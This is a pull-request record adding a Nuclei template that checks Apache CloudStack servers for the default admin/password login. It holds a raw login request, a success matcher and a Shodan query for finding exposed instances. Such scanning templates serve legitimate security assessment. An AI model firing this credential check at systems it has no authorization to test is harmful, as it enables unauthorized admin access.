Merge pull request #10422 from projectdiscovery/cloudstack-default-login

Create cloudstack-default-login.yaml

http/default-logins/apache/cloudstack-default-login.yaml

@@ -0,0 +1,40 @@
+id: cloudstack-default-login
+
+info:
+  name: Apache CloudStack - Default Login
+  author: DhiyaneshDK
+  severity: high
+  description: |
+    CloudStack instance discovered using weak default credentials, allows the attacker to gain admin privilege.
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: http.title:"Apache CloudStack"
+  tags: default-login,apache,cloudstack
+
+http:
+  - raw:
+      - |
+        POST /client/api/ HTTP/1.1
+        Host: {{Hostname}}
+        Accept: application/json, text/plain, */*
+        Content-Type: application/x-www-form-urlencoded
+
+        command=login&username={{username}}&password={{password}}&domain=%2F&response=json
+
+    attack: pitchfork
+
+    payloads:
+      username:
+        - admin
+      password:
+        - password
+
+    host-redirects: true
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code == 200"
+          - "contains(content_type, 'application/json')"
+          - "contains_all(body, 'sessionkey','domainid','userid')"
+        condition: and